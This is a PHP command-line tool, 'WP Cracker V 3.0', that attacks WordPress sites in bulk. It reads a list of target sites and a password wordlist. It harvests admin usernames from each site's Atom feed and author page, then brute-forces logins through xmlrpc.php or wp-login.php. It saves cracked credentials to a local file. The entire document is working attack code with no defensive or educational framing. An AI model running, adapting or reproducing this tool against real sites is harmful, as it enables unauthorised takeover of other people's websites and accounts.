WP Cracker V 3.0

1. <?
2.  
3. error_reporting(0);
4. set_time_limit(0);
5. ini_set('memory_limit', '640000M');
6.  
7.  
8. echo"
9.  
10. [#]=============================[#]
11.  
12. [#] WP Brute Forcer V 3.0 [#]
13.  
14. [#] Nani17 - fb.com/root.sy3 [#]
15.  
16. [#] MaDe By Islam [#]
17.  
18. [#] Last Update : 26/9/2014 [#]
19.  
20. [#]=============================[#]
21.  
22. ";
23. //$f1 = fopen("coki.txt","w");
24. //fclose($f1);
25.  
26. echo"\n(Enter Sites List) => ";
27. $sites = trim(fgets(STDIN,1024));
28.  
29. $k2=trim(@file_get_contents($sites));
30. $list2=@explode("\n",$k2);
31. $count2 =count($list2);
32.  
33. echo"(Enter wordlist) => ";
34. $wl = trim(fgets(STDIN,1024));
35.  
36. $k=trim(@file_get_contents($wl));
37. $list=@explode("\n",$k);
38. $count =@count($list);
39.  
40. if($k){
41. echo"\n[*] $count2 site and $count password loaded \n";
42. echo"\n[*] Cracking ... \n\n";
43. }else{
44. echo "[*] no file found \n";
45. exit();
46. }
47.  
48. function brute($list2,$list){
49. foreach($list2 as $site){
50.  
51. $site = trim($site);
52.  
53. $gets = $site."/wp-trackback.php";
54. $ch2 = curl_init();
55. curl_setopt($ch2, CURLOPT_URL, $gets);
56. curl_setopt($ch2, CURLOPT_HEADER, 0);
57. curl_setopt($ch2,CURLOPT_RETURNTRANSFER, 1);
58. curl_setopt($ch2,CURLOPT_FOLLOWLOCATION, 1);
59. curl_setopt($ch2, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
60. $result2 = curl_exec($ch2);
61. curl_exec($ch2);
62. curl_close($ch2);
63.  
64. if(preg_match("/need/i",$result2)){
65.  
66. $user = $site."/?feed=atom";
67. $ch = curl_init();
68. curl_setopt($ch, CURLOPT_URL, $user);
69. curl_setopt($ch, CURLOPT_HEADER, 0);
70. curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
71. curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
72. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
73. $result = curl_exec($ch);
74. curl_exec($ch);
75. curl_close($ch);
76. preg_match('#<name>(.*?)</name>#', $result, $username);
77.  
78. $user1 = $site."/?author=1";
79. $ch1 = curl_init();
80. curl_setopt($ch1, CURLOPT_URL, $user1);
81. curl_setopt($ch1, CURLOPT_HEADER, 0);
82. curl_setopt($ch1,CURLOPT_RETURNTRANSFER, 1);
83. curl_setopt($ch1,CURLOPT_FOLLOWLOCATION, 1);
84. curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
85. $result1 = curl_exec($ch1);
86. curl_exec($ch1);
87. curl_close($ch1);
88. preg_match('#<title>(.*?)</title>#', $result1, $username1);
89. $account = explode(' |', $username1[1]);
90.  
91.  
92. $check = @get_headers($site."/xmlrpc.php");
93. $uz = $site."/wp-admin/";
94.  
95. $method1 = strlen($username[1]);
96. $method2 = strlen($account[0]);
97.  
98. $dataz = "
99. <methodCall>
100. <methodName>wp.getUsersBlogs</methodName>
101. <params>
102. <param><value><string>adminnnn</string></value></param>
103. <param><value><string>adminnnn</string></value></param>
104. </params></methodCall>
105. ";
106. $curlz = curl_init();
107. curl_setopt($curlz,CURLOPT_URL, $site."/xmlrpc.php");
108. curl_setopt($curlz,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
109. curl_setopt($curlz,CURLOPT_HTTPHEADER,$headers);
110. curl_setopt($curlz,CURLOPT_RETURNTRANSFER,1);
111. curl_setopt($curlz,CURLOPT_FOLLOWLOCATION,1);
112. curl_setopt($curlz,CURLOPT_TIMEOUT,10);
113. curl_setopt($curlz,CURLOPT_CONNECTTIMEOUT,10);
114. curl_setopt($curlz,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
115. curl_setopt($curlz,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
116. curl_setopt($curlz,CURLOPT_POSTFIELDS, $dataz);
117. $resultz = curl_exec($curlz);
118. curl_close($curlz);
119.  
120. if(eregi("200",$check[0]) && !eregi("<string>parse error. not well formed</string>" , $resultz)){
121. if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
122. foreach($list as $pass){
123. $pass = trim($pass);
124.  
125. $headers = array('Content-Type: application/x-www-form-urlencoded');
126. $isadmin = '<name>isAdmin</name>';
127. #############################
128. ## TESTING EACH PASSWORD ##
129. #############################
130. $data = "
131. <methodCall>
132. <methodName>wp.getUsersBlogs</methodName>
133. <params>
134. <param><value><string>$username[1]</string></value></param>
135. <param><value><string>$pass</string></value></param>
136. </params></methodCall>
137. ";
138. $curl = curl_init();
139. curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
140. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
141. curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
142. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
143. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
144. curl_setopt($curl,CURLOPT_TIMEOUT,10);
145. curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
146. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
147. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
148. curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
149. $result = curl_exec($curl);
150. curl_close($curl);
151. ##########################
152. ## CHECK IF IT WORKED ##
153. ##########################
154. if(strstr($result, $isadmin)){
155. echo"[+] Password is : $pass\n";
156. $fo = fopen("jh.txt","a+");
157. fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
158. fclose($fo);
159. break;
160. }
161.  
162. else{
163. echo "[-] $site : ($username[1]:$pass) -> error\n";
164. }}}
165.  
166. elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
167. foreach($list as $pass){
168. $headers = array('Content-Type: application/x-www-form-urlencoded');
169. $isadmin = '<name>isAdmin</name>';
170. #############################
171. ## TESTING EACH PASSWORD ##
172. #############################
173. $data = "
174. <methodCall>
175. <methodName>wp.getUsersBlogs</methodName>
176. <params>
177. <param><value><string>$account[0]</string></value></param>
178. <param><value><string>$pass</string></value></param>
179. </params></methodCall>
180. ";
181. $curl = curl_init();
182. curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
183. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
184. curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
185. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
186. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
187. curl_setopt($curl,CURLOPT_TIMEOUT,10);
188. curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
189. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
190. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
191. curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
192. $result = curl_exec($curl);
193. curl_close($curl);
194. ##########################
195. ## CHECK IF IT WORKED ##
196. ##########################
197. if(strstr($result, $isadmin)){
198. echo"[+] Password is : $pass\n";
199. $fo = fopen("jh.txt","a+");
200. fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
201. fclose($fo);
202. break;
203. }
204.  
205. else{
206. echo "[-] $site : ($account[0]:$pass) -> error\n";
207. }}}
208.  
209. else{
210. $admin = "admin";
211. foreach($list as $pass){
212. $pass = trim($pass);
213. $headers = array('Content-Type: application/x-www-form-urlencoded');
214. $isadmin = '<name>isAdmin</name>';
215. #############################
216. ## TESTING EACH PASSWORD ##
217. #############################
218. $data = "
219. <methodCall>
220. <methodName>wp.getUsersBlogs</methodName>
221. <params>
222. <param><value><string>$admin</string></value></param>
223. <param><value><string>$pass</string></value></param>
224. </params></methodCall>
225. ";
226. $curl = curl_init();
227. curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
228. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
229. curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
230. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
231. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
232. curl_setopt($curl,CURLOPT_TIMEOUT,10);
233. curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
234. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
235. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
236. curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
237. $result = curl_exec($curl);
238. curl_close($curl);
239. ##########################
240. ## CHECK IF IT WORKED ##
241. ##########################
242. if(strstr($result, $isadmin)){
243. echo"[+] Password is : $pass\n";
244. $fo = fopen("jh.txt","a+");
245. fwrite($fo,"[+] $site/wp-admin\n $admin:$pass\n\n");
246. fclose($fo);
247. break;
248. }
249.  
250. else{
251. echo "[-] $site : ($admin:$pass) -> error\n";
252. }
253. }}
254.  
255.  
256. }
257.  
258.  
259.  
260. else{
261. if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
262. foreach($list as $pass){
263. $pass = trim($pass);
264. $ch = curl_init();
265. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
266. curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
267. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
268. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
269. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
270. curl_setopt($ch,CURLOPT_POST,TRUE);
271. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username[1]."&pwd=".$pass."&wp-submit=Giri‏"."&redirect_to=".$uz."&testcookie=1");
272. $exec = curl_exec($ch);
273. curl_close($ch);
274.  
275. if(preg_match("/profile.php/",$exec)){
276. echo"[+] Password is : $pass\n";
277. $fo = fopen("jh.txt","a+");
278. fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
279. fclose($fo);
280. break;
281. }
282.  
283. else{
284. echo "[-] $site : ($username[1]:$pass) -> error\n";
285. }
286. }}
287.  
288.  
289. elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
290. foreach($list as $pass){
291. $pass = trim($pass);
292. $ch = curl_init();
293. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
294. curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
295. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
296. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
297. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
298. curl_setopt($ch,CURLOPT_POST,TRUE);
299. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$account[0]."&pwd=".$pass."&wp-submit=Giri‏"."&redirect_to=".$uz."&testcookie=1");
300. $exec = curl_exec($ch);
301. curl_close($ch);
302.  
303. if(preg_match("/profile.php/",$exec)){
304. echo"[+] Password is : $pass\n";
305. $fo = fopen("jh.txt","a+");
306. fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
307. fclose($fo);
308. break;
309. }
310.  
311. else{
312. echo "[-] $site : ($account[0]:$pass) -> error\n";
313. }}}
314.  
315.  
316. else{
317.  
318. foreach($list as $pass){
319. $pass = trim($pass);
320. $ch = curl_init();
321. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
322. curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
323. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
324. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
325. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
326. curl_setopt($ch,CURLOPT_POST,TRUE);
327. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=admin&pwd=".$pass."&wp-submit=Giri‏"."&redirect_to=".$uz."&testcookie=1");
328. $exec = curl_exec($ch);
329. curl_close($ch);
330.  
331. if(preg_match("/profile.php/",$exec)){
332. echo"[+] Password is : $pass\n";
333. $fo = fopen("jh.txt","a+");
334. fwrite($fo,"[+] $site/wp-admin\n admin:$pass\n\n");
335. fclose($fo);
336. break;
337. }
338.  
339. else{
340. echo "[-] $site : (admin:$pass) -> error\n";
341. }
342. }}}
343.  
344. }}}
345. brute($list2,$list);
346. ?>